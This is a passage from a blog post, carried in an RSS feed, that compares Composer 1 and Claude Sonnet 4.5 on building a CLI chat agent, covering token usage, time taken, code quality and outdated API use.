&lt;p&gt;Token usage was around &lt;strong&gt;200K&lt;/strong&gt; tokens. The first response took roughly 3 minutes; the follow-up turns took negligible time.&lt;/p&gt;

&lt;p&gt;Though it wasn't asked to, it did quite a good job with the code quality and the overall user interface of the CLI chat.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 One thing I found a bit irritating is the number of comments it writes; there's a comment for every single line, which is insane! For many, it could be great, but this definitely feels a bit too much.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Response from Sonnet 4.5
&lt;/h3&gt;

&lt;p&gt;You can find the entire source code here: &lt;a href="https://gist.github.com/shricodev/30b9218148df4bc35080336824f85b5e" rel="noopener noreferrer"&gt;Claude Sonnet 4.5 AI Agent with Tool Router&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/4BJKeZfCe1M"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;Sonnet kinda disappointed me here. The code quality was fine, yet it repeatedly used the old YouTube Transcript API methods (&lt;code&gt;get_transcript&lt;/code&gt;, &lt;code&gt;list_transcripts&lt;/code&gt;) even after being shown the newer version.&lt;/p&gt;

&lt;p&gt;I eventually had to fix that part myself. And for some reason, whenever I asked for a small change, Sonnet rewrote half the working code, which felt unnecessary and ate up tokens like crazy.&lt;/p&gt;

&lt;p&gt;Its total token usage was nearly double Composer's, around &lt;strong&gt;427K tokens&lt;/strong&gt;, and it took about 10 minutes to finish the job.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuwy2rg9jnv8q6rzgqlmx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuwy2rg9jnv8q6rzgqlmx.png" alt="Claude 4.5 Sonnet cost to build the agent"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To be fair, its implementation of the Tool Router itself was solid but quite a bit slower and heavier overall.&lt;/p&gt;

&lt;h3&gt;
  
  
  Summary
&lt;/h3&gt;

&lt;p&gt;To summarize the results, there's not much difference I could find in code quality or implementation; both were able to read the Tool Router documentation and implement it well. But for some reason, it was tough to get Sonnet to use the new API instead of the one it was trained on.&lt;/p&gt;

&lt;p&gt;Token usage and implementation time are just &lt;strong&gt;not comparable&lt;/strong&gt;. Claude used around 427K tokens, about &lt;strong&gt;2.1 times&lt;/strong&gt; Composer 1's roughly 200K. In terms of time, there's a significant difference too, and I also had to do many more follow-ups here than with Composer.&lt;/p&gt;




&lt;h2&gt;
  
  
  Wrap Up!
&lt;/h2&gt;

&lt;p&gt;This was a really quick test. You could ask for more features on the agent and compare both models' results, but I'll leave that to you. Even from this small run, though, Composer 1 stands out. ⚡&lt;/p&gt;

&lt;p&gt;In roughly half the time and with far fewer tokens, it matched or even slightly outperformed Sonnet 4.5 in overall coding quality.&lt;/p&gt;

&lt;p&gt;From my experience using it, I don’t think you’ll run into any major issues choosing Composer over Sonnet for everyday development. It’s fast, consistent, and honestly feels built for this exact kind of work.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7nd4aur01c4dnzebxvtj.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7nd4aur01c4dnzebxvtj.gif" alt="Thumbs up GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Would love to hear if anyone else has benchmarked this model with cool real world projects. ✌️&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>programming</category>
      <category>ai</category>
      <category>javascript</category>
    </item>
  </channel>
</rss>
